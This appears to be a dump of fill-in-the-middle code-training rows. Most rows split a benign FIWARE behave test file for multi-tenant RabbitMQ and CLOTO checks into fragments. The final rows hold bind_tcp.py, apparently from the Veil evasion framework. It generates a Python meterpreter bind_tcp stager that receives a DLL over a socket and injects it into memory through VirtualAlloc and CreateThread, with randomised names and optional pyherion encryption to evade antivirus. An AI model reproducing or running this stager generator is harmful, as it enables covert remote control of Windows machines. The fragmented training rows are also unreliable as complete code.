file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
39k
| suffix
large_stringlengths 0
36.1k
| middle
large_stringlengths 0
29.4k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
multi_tenancy.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with [email protected]
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
    """Register the configured secondary tenant-id in the CLOTO component.

    Reads the secondary tenant-id from the FACTS service configuration,
    builds a CLOTO REST client for that tenant and issues a GET request so
    that CLOTO initialises all data about the tenant in its system.
    Fails the step if CLOTO does not answer OK.
    """
    facts_conf = configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE]
    context.secondary_tenant_id = facts_conf[PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]

    print ("> Initiating Cloto REST Client for the secondary Tenant")
    cloto_conf = configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE]
    context.secondary_cloto_client = ClotoClient(
        username=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
        password=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
        tenant_id=context.secondary_tenant_id,
        auth_url=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
        api_protocol=cloto_conf[PROPERTIES_CONFIG_SERVICE_PROTOCOL],
        api_host=cloto_conf[PROPERTIES_CONFIG_SERVICE_HOST],
        api_port=cloto_conf[PROPERTIES_CONFIG_SERVICE_PORT],
        api_resource=cloto_conf[PROPERTIES_CONFIG_SERVICE_RESOURCE])

    print ("> A GET request is executed to CLOTO component, "
           "to init all data about that secondary tenant in its system.")
    tenant_resource_client = context.secondary_cloto_client.get_tenant_id_resource_client()
    _, response = tenant_resource_client.get_tenant_id(context.secondary_tenant_id)
    assert_that(response.ok,
                "TenantId '{}' for testing cannot be "
                "retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
    """Send the context notification(s) from the step table for the secondary tenant.

    Delegates to the shared step helper, passing the secondary tenant-id
    that was resolved by a previous step.
    """
    tenant_id = context.secondary_tenant_id
    send_context_notification_step_helper(context, tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondaty_consumer_looking_for_messages(context):
    """Create, configure and start a RabbitMQ consumer for the secondary tenant.

    The consumer is registered in ``context.rabbitmq_consumer_list`` so it can
    be cleaned up later, the default window-size message is published for the
    secondary tenant, and the consumer is started in a background thread with
    the secondary tenant-id as routing key.
    """
    rabbit_conf = configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE]

    # Init RabbitMQ consumer
    consumer = RabbitMQConsumer(
        amqp_host=rabbit_conf[PROPERTIES_CONFIG_SERVICE_HOST],
        amqp_port=rabbit_conf[PROPERTIES_CONFIG_SERVICE_PORT],
        amqp_user=rabbit_conf[PROPERTIES_CONFIG_SERVICE_USER],
        amqp_password=rabbit_conf[PROPERTIES_CONFIG_SERVICE_PASSWORD])
    facts_message_config = rabbit_conf[PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
    consumer.exchange = facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
    consumer.exchange_type = facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
    context.secondaty_rabbitmq_consumer = consumer

    # Append consumer to the 'context' consumer list
    context.rabbitmq_consumer_list.append(consumer)

    # Set default window size to 2 (FACTS) - Secondary Tenant
    message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
    context.rabbitmq_publisher.send_message(message)

    # Run secondary consumer
    consumer.routing_key = context.secondary_tenant_id
    consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
    """Check each step-table row against the messages received by the secondary consumer.

    Every row is converted to a dict, normalised via the dataset utils and
    asserted to be present in the secondary consumer's message list.
    """
    received_messages = context.secondaty_rabbitmq_consumer.message_list
    for row in context.table.rows:
        expected_message = _dataset_utils.prepare_data(dict(row.as_dict()))
        assert_that(expected_message, is_message_in_consumer_list(received_messages),
                    "A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
    """Assert that the secondary RabbitMQ consumer has received no messages.

    Bug fix: the original debug traces were swapped — the secondary
    consumer's list was printed under the 'main' label and the main
    consumer's list under the (misspelled) 'seconday' label.
    """
    print ("> Received main list: " + str(context.rabbitmq_consumer.message_list))
    print ("> Received secondary list: " + str(context.secondaty_rabbitmq_consumer.message_list))
    assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0),
                "Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
    """Publish a window-size message for the secondary tenant to RabbitMQ.

    Reconstructed: the original closing line was fused with dataset-dump
    markers; logic matches the intact duplicates of this step in the file.
    """
    message = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
    context.rabbitmq_publisher.send_message(message)
| random_line_split |
multi_tenancy.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with [email protected]
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
    """Register the configured secondary tenant-id in the CLOTO component.

    The tenant-id is taken from the FACTS service configuration; a CLOTO
    client is created for it and a GET request initialises the tenant's
    data in CLOTO. The step fails when CLOTO does not answer OK.
    """
    facts_conf = configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE]
    context.secondary_tenant_id = facts_conf[PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]

    print ("> Initiating Cloto REST Client for the secondary Tenant")
    cloto_conf = configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE]
    context.secondary_cloto_client = ClotoClient(
        username=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
        password=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
        tenant_id=context.secondary_tenant_id,
        auth_url=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
        api_protocol=cloto_conf[PROPERTIES_CONFIG_SERVICE_PROTOCOL],
        api_host=cloto_conf[PROPERTIES_CONFIG_SERVICE_HOST],
        api_port=cloto_conf[PROPERTIES_CONFIG_SERVICE_PORT],
        api_resource=cloto_conf[PROPERTIES_CONFIG_SERVICE_RESOURCE])

    print ("> A GET request is executed to CLOTO component, "
           "to init all data about that secondary tenant in its system.")
    tenant_resource_client = context.secondary_cloto_client.get_tenant_id_resource_client()
    _, response = tenant_resource_client.get_tenant_id(context.secondary_tenant_id)
    assert_that(response.ok,
                "TenantId '{}' for testing cannot be "
                "retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
    """Send the context notification(s) from the step table using the secondary tenant-id."""
    tenant_id = context.secondary_tenant_id
    send_context_notification_step_helper(context, tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondaty_consumer_looking_for_messages(context):
    """Create, configure and start a secondary-tenant RabbitMQ consumer thread.

    The consumer is appended to ``context.rabbitmq_consumer_list`` for later
    cleanup; the default FACTS window-size message is published for the
    secondary tenant before the consumer starts.
    """
    rabbit_conf = configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE]

    # Init RabbitMQ consumer
    consumer = RabbitMQConsumer(
        amqp_host=rabbit_conf[PROPERTIES_CONFIG_SERVICE_HOST],
        amqp_port=rabbit_conf[PROPERTIES_CONFIG_SERVICE_PORT],
        amqp_user=rabbit_conf[PROPERTIES_CONFIG_SERVICE_USER],
        amqp_password=rabbit_conf[PROPERTIES_CONFIG_SERVICE_PASSWORD])
    facts_message_config = rabbit_conf[PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
    consumer.exchange = facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
    consumer.exchange_type = facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
    context.secondaty_rabbitmq_consumer = consumer

    # Append consumer to the 'context' consumer list
    context.rabbitmq_consumer_list.append(consumer)

    # Set default window size to 2 (FACTS) - Secondary Tenant
    message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
    context.rabbitmq_publisher.send_message(message)

    # Run secondary consumer
    consumer.routing_key = context.secondary_tenant_id
    consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
    """Check each step-table row against the messages received by the secondary consumer.

    Reconstructed: the original body was split by dataset-dump markers;
    logic matches the intact duplicates of this step in the file.
    """
    for element in context.table.rows:
        expected_message = dict(element.as_dict())
        expected_message = _dataset_utils.prepare_data(expected_message)
        assert_that(expected_message, is_message_in_consumer_list(context.secondaty_rabbitmq_consumer.message_list),
                    "A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
    """Assert that the secondary RabbitMQ consumer has received no messages.

    Bug fix: the original debug traces were swapped — the secondary
    consumer's list was printed under the 'main' label and the main
    consumer's list under the (misspelled) 'seconday' label.
    """
    print ("> Received main list: " + str(context.rabbitmq_consumer.message_list))
    print ("> Received secondary list: " + str(context.secondaty_rabbitmq_consumer.message_list))
    assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0),
                "Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
    """Publish a window-size message for the secondary tenant to RabbitMQ."""
    payload = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
    context.rabbitmq_publisher.send_message(payload)
| r element in context.table.rows:
expected_message = dict(element.as_dict())
expected_message = _dataset_utils.prepare_data(expected_message)
assert_that(expected_message, is_message_in_consumer_list(context.secondaty_rabbitmq_consumer.message_list),
"A message with the expected content has not been received by the secondary RabbitMQ consumer")
| identifier_body |
multi_tenancy.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with [email protected]
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
    """Register the configured secondary tenant-id in the CLOTO component.

    Reconstructed: the original ``def`` line was split by dataset-dump
    markers; the name matches the intact duplicates of this step in the
    file. Reads the secondary tenant-id from the FACTS configuration,
    builds a CLOTO client for it and issues a GET request so CLOTO
    initialises all data about the tenant.
    """
    facts_conf = configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE]
    context.secondary_tenant_id = facts_conf[PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]

    print ("> Initiating Cloto REST Client for the secondary Tenant")
    cloto_conf = configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE]
    context.secondary_cloto_client = ClotoClient(
        username=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
        password=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
        tenant_id=context.secondary_tenant_id,
        auth_url=cloto_conf[PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
        api_protocol=cloto_conf[PROPERTIES_CONFIG_SERVICE_PROTOCOL],
        api_host=cloto_conf[PROPERTIES_CONFIG_SERVICE_HOST],
        api_port=cloto_conf[PROPERTIES_CONFIG_SERVICE_PORT],
        api_resource=cloto_conf[PROPERTIES_CONFIG_SERVICE_RESOURCE])

    print ("> A GET request is executed to CLOTO component, "
           "to init all data about that secondary tenant in its system.")
    tenant_resource_client = context.secondary_cloto_client.get_tenant_id_resource_client()
    _, response = tenant_resource_client.get_tenant_id(context.secondary_tenant_id)
    assert_that(response.ok,
                "TenantId '{}' for testing cannot be "
                "retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
    """Send the context notification(s) from the step table using the secondary tenant-id."""
    tenant_id = context.secondary_tenant_id
    send_context_notification_step_helper(context, tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondaty_consumer_looking_for_messages(context):
    """Create, configure and start a secondary-tenant RabbitMQ consumer thread.

    The consumer is appended to ``context.rabbitmq_consumer_list`` for later
    cleanup; the default FACTS window-size message is published for the
    secondary tenant before the consumer starts.
    """
    rabbit_conf = configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE]

    # Init RabbitMQ consumer
    consumer = RabbitMQConsumer(
        amqp_host=rabbit_conf[PROPERTIES_CONFIG_SERVICE_HOST],
        amqp_port=rabbit_conf[PROPERTIES_CONFIG_SERVICE_PORT],
        amqp_user=rabbit_conf[PROPERTIES_CONFIG_SERVICE_USER],
        amqp_password=rabbit_conf[PROPERTIES_CONFIG_SERVICE_PASSWORD])
    facts_message_config = rabbit_conf[PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
    consumer.exchange = facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
    consumer.exchange_type = facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
    context.secondaty_rabbitmq_consumer = consumer

    # Append consumer to the 'context' consumer list
    context.rabbitmq_consumer_list.append(consumer)

    # Set default window size to 2 (FACTS) - Secondary Tenant
    message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
    context.rabbitmq_publisher.send_message(message)

    # Run secondary consumer
    consumer.routing_key = context.secondary_tenant_id
    consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
    """Check each step-table row against the messages received by the secondary consumer."""
    received_messages = context.secondaty_rabbitmq_consumer.message_list
    for row in context.table.rows:
        expected_message = _dataset_utils.prepare_data(dict(row.as_dict()))
        assert_that(expected_message, is_message_in_consumer_list(received_messages),
                    "A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
    """Assert that the secondary RabbitMQ consumer has received no messages.

    Bug fix: the original debug traces were swapped — the secondary
    consumer's list was printed under the 'main' label and the main
    consumer's list under the (misspelled) 'seconday' label.
    """
    print ("> Received main list: " + str(context.rabbitmq_consumer.message_list))
    print ("> Received secondary list: " + str(context.secondaty_rabbitmq_consumer.message_list))
    assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0),
                "Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
    """Publish a window-size message for the secondary tenant to RabbitMQ."""
    payload = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
    context.rabbitmq_publisher.send_message(payload)
| ven_tenant_id_is_registered_in_cloto(c | identifier_name |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
    """Store the CLI options object and the payload's static metadata.

    :param cli_obj: parsed command-line options; ``ordnance_payload``,
        ``msfvenom`` and ``tool`` attributes select the payload type.
    """
    # required options
    self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
    self.rating = "Excellent"
    self.name = "Pure Python Reverse TCP stager"
    self.path = "python/meterpreter/bind_tcp"
    self.cli_opts = cli_obj
    self.payload_source_code = ""
    self.language = "python"
    self.extension = "py"

    # NOTE(review): when a tool is selected and neither an ordnance nor a
    # msfvenom payload is given, payload_type is intentionally left unset,
    # exactly as in the original chain below.
    if cli_obj.ordnance_payload is not None:
        self.payload_type = cli_obj.ordnance_payload
    elif cli_obj.msfvenom is not None:
        self.payload_type = cli_obj.msfvenom
    elif not cli_obj.tool:
        self.payload_type = ""

    # optional
    # options we require user interaction for- format is {OPTION : [Value, Description]]}
    self.required_options = {
        "COMPILE_TO_EXE": ["Y", "Compile to an executable"],
        "RHOST": ["", "The listen target address"],
        "LPORT": ["4444", "The listen port"],
        "USE_PYHERION": ["N", "Use the pyherion encrypter"]}
def generate(self):
    """Build the pure-python windows/meterpreter/bind_tcp stager source.

    Reconstructed: the method name was removed by dataset-dump markers;
    it is restored from the intact duplicates of this module in the file.
    The emitted script binds to RHOST:LPORT, accepts the handler's
    connection, downloads the meterpreter DLL, patches the connected
    socket's file descriptor into it and injects it into memory via
    ctypes. The result is stored in ``self.payload_source_code``.
    """
    # randomize all of the variable names used
    shellCodeName = evasion_helpers.randomString()
    socketName = evasion_helpers.randomString()
    clientSocketName = evasion_helpers.randomString()
    getDataMethodName = evasion_helpers.randomString()
    fdBufName = evasion_helpers.randomString()
    rcvStringName = evasion_helpers.randomString()
    rcvCStringName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    tempShellcodeName = evasion_helpers.randomString()
    shellcodeBufName = evasion_helpers.randomString()
    fpName = evasion_helpers.randomString()
    tempCBuffer = evasion_helpers.randomString()

    payload_code = "import struct, socket, binascii, ctypes, random, time\n"
    # socket and shellcode variables that need to be kept global
    payload_code += "%s, %s = None, None\n" % (shellCodeName, socketName)

    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payload_code += "def %s():\n" % (getDataMethodName)
    payload_code += "\ttry:\n"
    payload_code += "\t\tglobal %s\n" % (socketName)
    payload_code += "\t\tglobal %s\n" % (clientSocketName)
    # build the socket and connect to the handler
    payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (socketName)
    payload_code += "\t\t%s.bind(('%s', %s))\n" % (socketName, self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
    payload_code += "\t\t%s.listen(1)\n" % (socketName)
    payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
    # pack the underlying socket file descriptor into a c structure
    payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName, clientSocketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % (clientSocketName)
    payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
    # receive ALL of the payload .dll data
    payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
    payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName, rcvStringName, rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" % (rcvCStringName)
    # copy the socket fd in
    payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
    payload_code += "\t\treturn %s\n" % (rcvCStringName)
    payload_code += "\texcept: return None\n"

    # build the method that injects the .dll into memory
    payload_code += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
    payload_code += "\tif %s != None:\n" % (tempShellcodeName)
    payload_code += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName)
    # allocate enough virtual memory to stuff the .dll in
    payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (fpName, shellcodeBufName)
    # virtual lock to prevent the memory from paging out to disk
    payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % (fpName, shellcodeBufName)
    payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (tempCBuffer, shellcodeBufName, shellcodeBufName)
    # copy the .dll into the allocated memory
    payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % (fpName, tempCBuffer, shellcodeBufName)
    # kick the thread off to execute the .dll
    payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (fpName)
    # wait for the .dll execution to finish
    payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"

    # download the stager
    payload_code += "%s = %s()\n" % (shellCodeName, getDataMethodName)
    # inject what we grabbed
    payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName)

    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
    """Store the CLI options object and the payload's static metadata.

    Reconstructed: a comment line was displaced by dataset-dump markers;
    content matches the intact duplicates of this module in the file.

